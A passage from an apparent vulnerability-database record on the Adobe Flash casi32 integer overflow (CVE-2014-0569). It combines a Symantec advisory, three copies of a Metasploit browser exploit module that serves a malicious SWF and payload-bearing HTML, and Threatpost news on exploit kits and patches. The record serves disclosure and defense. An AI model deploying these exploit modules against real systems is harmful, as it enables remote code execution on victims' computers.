* Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Gentoo Linux \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SMNTC-70441", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70441", "type": "symantec", "title": "Adobe Flash Player and AIR CVE-2014-0569 Integer Overflow Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-12-06T15:44:43", "bulletinFamily": "exploit", "description": "This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\n", "modified": "2017-07-24T13:26:21", "published": "2015-04-10T00:37:26", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_CASI32_INT_OVERFLOW", "href": "", "type": "metasploit", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\n 'Description' => %q{\n This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\n domainMemory for the current application domain. This module has been tested successfully\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bilou', # Vulnerability discovery\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['ZDI', '14-365'],\n ['CVE', '2014-0569'],\n ['OSVDB', '113199'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },\n :flash => lambda { |ver| ver =~ /^15\\./ && Gem::Version.new(ver) <= Gem::Version.new('15.0.0.167') },\n :arch => ARCH_X86\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 14 2014',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n platform_id = 'win'\n os_name = target_info[:os_name]\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:37", "bulletinFamily": "exploit", "description": "", "modified": "2015-04-10T00:00:00", "published": "2015-04-10T00:00:00", "href": "https://packetstormsecurity.com/files/131382/Adobe-Flash-Player-casi32-Integer-Overflow.html", "id": "PACKETSTORM:131382", "type": "packetstorm", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player casi32 Integer Overflow', \n'Description' => %q{ \nThis module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in \nthe casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as \ndomainMemory for the current application domain. This module has been tested successfully \non Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'bilou', # Vulnerability discovery \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['ZDI', '14-365'], \n['CVE', '2014-0569'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'], \n['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 14 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131382/adobe_flash_casi32_int_overflow.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-04T04:14:25", "bulletinFamily": "exploit", "description": "Adobe Flash Player casi32 Integer Overflow. CVE-2014-0569. Remote exploit for windows platform", "modified": "2015-04-13T00:00:00", "published": "2015-04-13T00:00:00", "id": "EDB-ID:36744", "href": "https://www.exploit-db.com/exploits/36744/", "type": "exploitdb", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\r\n 'Description' => %q{\r\n This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\r\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\r\n domainMemory for the current application domain. This module has been tested successfully\r\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['ZDI', '14-365'],\r\n ['CVE', '2014-0569'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36744/"}], "threatpost": [{"lastseen": "2018-10-06T22:57:52", "bulletinFamily": "info", "description": "Adobe pushed out security updates for Flash Player this afternoon, addressing 18 different vulnerabilities, all critical, that could allow an attacker to take control of an affected system running the multimedia platform according to a [security bulletin posted today](<http://helpx.adobe.com/security/products/flash-player/apsb14-24.html>).\n\nThe Patch Tuesday updates, available for Windows, Macintosh, and Linux machines, remedy vulnerabilities in several builds of Flash Player and AIR, Adobe\u2019s run-time system.\n\nThe lion\u2019s share of the vulnerabilities \u2013 15 of the 18 \u2013 a use-after-free, double free, memory corruption, type confusion and buffer overflow vulnerability, could lead to code execution if left unpatched. Other vulnerabilities patched include issues that could trigger session tokens to be disclosed, and cause privilege escalation.\n\nResearchers with Google Project Zero, the Chromium Rewards Project, Microsoft, and several other firms dug up the vulnerabilities.\n\nAdobe is urging users running older versions of Flash Player (15.0.0.189 and earlier, 13.0.0.250 and earlier 13.x versions, 11.2.202.411 and earlier for Linux) and older versions of AIR (15.0.0.293 and earlier, SDK 15.0.0.302 and earlier, SDK & Compiler 15.0.0.302 and earlier, 15.0.0.293 and earlier for Android) to update as soon as possible.\n\nIn October, one week after Adobe pushed its [last handful of patches for Flash](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), attackers began bundling one of the fixed vulnerabilities (CVE-2014-0569) into the Fiesta exploit kit. Independent malware researcher Kafeine [wrote at the time](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) that it was a \u201creally fast integration\u201d into an exploit kit and that whoever coded it must have reversed the patch in two days. It remains to be seen whether any of the 18 vulnerabilities that were fixed today are either currently being exploited in the wild or if they\u2019ll eventually be incorporated into a future exploit kit.\n", "modified": "2014-11-17T15:58:02", "published": "2014-11-11T14:54:39", "id": "THREATPOST:FF33896826D8E265964D6C8BDFB7FEEA", "href": "https://threatpost.com/adobe-patches-18-vulnerabilities-in-flash/109300/", "type": "threatpost", "title": "Adobe Patches 18 Vulnerabilities in Flash", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:58", "bulletinFamily": "info", "description": "Two notorious exploit kits are already seeding vulnerable websites with exploits for a Flash Player vulnerability that was patched in last week\u2019s [Adobe security bulletin](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>).\n\nFrench researcher [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) told Threatpost that the most likely scenario is that a skilled coder found a way to reverse-engineer the Adobe patch in order to build the exploit. Regardless, a week from patch to inclusion in an exploit kit\u2014in this case the Angler and Fiesta EKs\u2014is a harsh reminder of how quickly the window from vulnerability to exploit can slam shut.\n\n\u201cThis is really, really fast,\u201d Kafeine said. \u201cThe best I remember was maybe three weeks in February 2014.\u201d\n\nKafeine was referring to CVE-2014-0497, another Flash exploit integrated into the Angler Exploit Kit that prompted an [emergency patch](<http://threatpost.com/emergency-adobe-update-patches-flash-zero-day/104044>) from Adobe on Feb. 4. Those exploits were dropping a password-grabbing Trojan targeting Chinese email and social media accounts, likely from an isolated campaign, said researchers from Kaspersky Lab at the time.\n\nLast week\u2019s patch addressed an [integer overflow vulnerability](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>) that could lead to code execution. An alert from Cisco said the bug is found in the casi32 implementation used by Flash.\n\n\u201cAn unauthenticated, remote attacker could exploit this vulnerability by persuading a user to visit a malicious web page that contains crafted Flash content,\u201d the [advisory](<http://tools.cisco.com/security/center/viewAlert.x?alertId=36094>) said. \u201cIf successful, the attacker could execute arbitrary code in the security context of the affected application. If the application is running with elevated privileges, this could result in a complete system compromise.\u201d\n\nFiesta and Angler are among a menu of exploit kits available on underground forums and used in campaigns to own websites and redirect victims off to sites hosting banking malware and other types of malicious code. Most recently, malicious ads from online ad network AppNexus were found on heavily trafficked websites such as TMZ. The [malvertising campaigns](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) used exploits in the Angler kit to infect visitors with malware by redirecting them from the host site to a third-party site, where additional attacks were carried out.\n\nIn addition to Flash and Java exploits, Angler has also been spreading [exploits for bugs in Microsoft Silverlight](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), a plug-in similar to Flash for streaming media. Silverlight is most well known for being used in the Netflix streaming service.\n\nAngler and Fiesta are among the potential successors to the [Blackhole Exploit Kit](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), which virtually disappeared after its creator, a Russian hacker known as Paunch, was arrested.\n", "modified": "2014-10-27T20:29:54", "published": "2014-10-22T15:18:42", "id": "THREATPOST:C556A86F578A25714343E05BBFC4D7DD", "href": "https://threatpost.com/exploit-for-patched-flash-vulnerability-already-in-two-exploit-kits/108972/", "type": "threatpost", "title": "New Adobe Flash Exploit Found in Angler, Fiesta EKs", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:44", "bulletinFamily": "info", "description": "Adobe is expected to update its Reader and Acrobat software next Tuesday as part of its scheduled security updates, and the updates will, according to an Adobe spokesperson, include patches for a [Reader vulnerability disclosed this week by Google\u2019s Project Zero](<http://threatpost.com/sandbox-escape-bug-in-adobe-reader-disclosed/109637>).\n\nResearcher James Forshaw, a well-known bug-hunter and Project Zero member, went public with details of a sandbox escape vulnerability in Reader as well as exploit code.\n\nPer its policy, Google\u2019s security research team discloses vulnerability details 90 days after it shares those details with the vendor in question. In this case, the vulnerability was partially addressed earlier by Adobe after it was reported in August. Adobe tweaked Reader in order to make exploiting the vulnerability much more difficult. The flaw, however, had not been patched.\n\nIn a pre-notification [advisory](<http://helpx.adobe.com/security/products/reader/apsb14-28.html>) published yesterday afternoon, Adobe said it will release a security update for Adobe Reader 11.0.09 and earlier, and 10.1.12 and earlier, as well as Acrobat 11.0.09 and earlier, and Acrobat 10.1.12 and earlier.\n\nForshaw said the vulnerability is a race condition in the handling of the MoveFileEx call hook in Adobe Reader.\n\n\u201cThis race can be won by the sandboxed process by using an OPLOCK to wait for the point where the MoveFileEx function opens the original file for the move. This allows code in the sandbox to write an arbitrary file to the file system,\u201d Forshaw wrote in the [Project Zero bug report](<https://code.google.com/p/google-security-research/issues/detail?id=103>).\n\nAdobe\u2019s adjustment to Reader in version 11.0.9 prevented the vulnerability from using the broker file system hooks to create directory junctions, Forshaw said.\n\nForshaw\u2019s disclosure came a week after Adobe released an [emergency security update for Flash Player](<http://threatpost.com/adobe-releases-emergency-flash-player-patch/109623>).\n\nThe Nov. 25 update patched a code-execution vulnerability in Flash that was already being exploited in the Angler and Nuclear exploit kits, French researcher [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) discovered. Adobe thought it had patched the issue in question with its [October security updates](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>) that addressed three memory-corruption vulnerabilities. The emergency patch resolved a fourth, CVE-2014-8439.\n\n\u201cThese updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,\u201d Adobe said in its advisory.\n", "modified": "2014-12-05T16:14:32", "published": "2014-12-05T09:19:13", "id": "THREATPOST:51AE17332E02AA24542CD19B500F69C3", "href": "https://threatpost.com/upcoming-adobe-reader-acrobat-update-to-patch-sandbox-escape/109738/", "type": "threatpost", "title": "December 2014 Adobe Reader, Acrobat Security Patches", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:47", "bulletinFamily": "info", "description": "Adobe today revised a [security bulletin](<http://helpx.adobe.com/security/products/flash-player/apsb14-26.html>) it released more than a month ago, adding a patch for a code-execution vulnerability in Flash Player already included in some [exploit kits](<https://threatpost.com/exploit-for-patched-flash-vulnerability-already-in-two-exploit-kits/108972>).\n\nFrench researcher Kafeine found the exploits in the Angler and Nuclear kits less than a week after [Adobe released an update Oct. 14](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>).\n\nThe update addressed three CVEs, all of which could lead to memory corruption or integer overflows, enabling attackers to remotely load and execute code on the compromised computer. Today\u2019s patch adds CVE-2014-8439, reported by [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) to Adobe.\n\n\u201cThese updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,\u201d Adobe said today in its advisory.\n\nFiesta and Angler are used to compromise vulnerable websites and redirect site visitors to sites hosting banking malware, [malvertising schemes](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) and other attacks. Flash Player bugs are among the most common vulnerabilities exploited by such kits, as well as Java and [Microsoft Silverlight vulnerabilities](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>).\n\nThe inclusion of the Oct. 14 CVEs in the exploit kits was worrisome to Kafeine, who does extensive research into these attack tools, noting that an attacker likely found a way to reverse-engineer the Adobe patch in order to drop it in the EK inside of a week.\n\nKafeine said that the Adobe patches released on Oct. 14 likely protected users from the active exploits, but the vulnerability remained exposed to future exploit development.\n\nToday\u2019s update moves Flash Player to version 15.0.0.239 for Windows and Macintosh users, and 11.2.202.424 for Linux users. Chrome and Internet Explorer users will be updated automatically by Google and Microsoft respectively.\n\nAnother [Adobe exploit in Angler](<http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498>) was reported last week, also by Kafeine.\n\nThis vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers.\n\n\u201cThe vulnerability is being exploited in blind mass attack. No doubt about it : the team behind Angler is really good at what it does,\u201d he said in a blog [post](<http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html>).\n", "modified": "2014-11-26T16:22:52", "published": "2014-11-25T13:22:26", "id": "THREATPOST:D2E078B72EFC850200253645E789C5C2", "href": "https://threatpost.com/adobe-releases-emergency-flash-player-patch/109623/", "type": "threatpost", "title": "Adobe Releases Emergency Flash Player Patch", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "bulletinFamily": "info", "description": "Microsoft and Adobe issued their monthly patch Tuesday releases today, and Microsoft posted eight bulletins, three of which are considered critical including the now-monthly cumulative Internet Explorer update, addressing 24 vulnerabilities in various products. Adobe has fixes for three vulnerabilities in both its Flash Player and ColdFusion lines.\n\n[The Microsoft patches](<https://technet.microsoft.com/library/security/ms14-oct>), which were plentiful despite last month\u2019s announcement that the company was [shuttering its Trustworthy Computing Group](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>), resolve vulnerabilities in Windows, Internet Explorer, the .NET Framework, Developer Tools, Office, Office Services and Web Apps.\n\nPatching priority should be given to MS14-058, a vulnerability in kernel mode driver that could enable remote code execution, according to Russ Ernst of Lumension.\n\nMS14-058 actually resolves two privately reported bugs, the more serious of which could give an attacker the ability to remotely execute code if a user opened a specially crafted document or visited an untrusted website containing embedded TrueType fonts.\n\nErnst notes that \u201cthis is under active attack and is applicable to all shipping versions of Windows, including the Server Core installations of Windows Server 2008 and Windows Server 2012, so it should be patched quickly.\u201d\n\nSecond priority, Ernst says, is the cumulative Internet Explorer update, which resolves 14 privately reported vulnerabilities, the most severe of which could be exploited to execute code remotely if the user opens a specially crafted webpage with Internet Explorer.\n\n\u201cThird on your priority list is the final critical bulletin this month, MS14-057. It covers vulnerabilities in the .NET framework that could allow a remote code execution,\u201d Ernst claims. \u201cThe vulnerabilities addressed in this bulletin were privately disclosed and there are no known active attacks.\u201d\n\nThe remaining bulletins from Microsoft \u2013 all important rated \u2013 consist of a vulnerability in ASP.net MVC that could allow for an attacker to bypass security features, a remote code execution bug in Windows OLE\u2013which is the zero day used by the [Sandworm APT](<https://threatpost.com/sandworm-apt-team-found-using-windows-zero-day-vulnerability/108815>) team\u2013another remote code execution issue in Microsoft Word and Office Web Apps, a privilege escalation problem in Message Queuing Service and another privilege escalation issue in FAT32 disk partition driver.\n\nOn to Adobe:\n\nThis patch Tuesday is primarily a [Flash Player](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>) affair with security updates for Adobe Flash Player for Windows, Macintosh and Linux, which seal off holes that could potentially have given attackers the capacity to take control of the affected system.\n\nFor that reason, four of the nine bugs addressed by the three CVEs here received Adobe highest priority rating. So, users of Flash Player desktop runtime for Windows and Mac should update to version 15.0.0.189 immediately; users of the Flash Player Extended Support Release should update to version 13.0.0.250; and Flash Player installed with Google Chrome, Internet Explorer 10 and Internet Explorer 11 will be automatically updated to the current versions.\n\nThe remaining bugs are not nearly as critical, but Adobe is still urging users of Flash Player for Linux to update to version 11.2.202.411; users of the AIR desktop runtime should update to version 15.0.0.293; users of the AIR SDK and AIR SDK & Compiler should update to version 15.0.0.302; and users of AIR for Android should update to Adobe AIR 15.0.0.293.\n\nAdobe gives credit to Ian Beer of Google Project Zero for CVE-2014-0558, Wen Guanxing from Venustech ADLAB for CVE-2014-0564 and bilou working with HP\u2019s Zero Day Initiative for CVE-2014-0569.\n\nAffected products include: Adobe Flash Player 15.0.0.167 and earlier versions, 13.0.0.244 and earlier 13.x versions, 11.2.202.406 and earlier versions for Linux, Adobe AIR desktop runtime 15.0.0.249 and earlier versions as well as the AIR SDK 15.0.0.249 and earlier versions and Compiler 15.0.0.249 and earlier versions and AIR 15.0.0.252 and earlier versions for Android.\n\nThe [ColdFusion](<http://helpx.adobe.com/security/products/coldfusion/apsb14-23.html#table>) patches are actually hotfixes resolving a series of moderately rated permissions issues and a few cross-site scripting and cross-site request forgery vulnerabilities. The permission problems could be exploited by an unauthenticated local user to bypass Internet protocol address access control restrictions applied to ColdFusion admins.\n\nAll of these patches, in versions 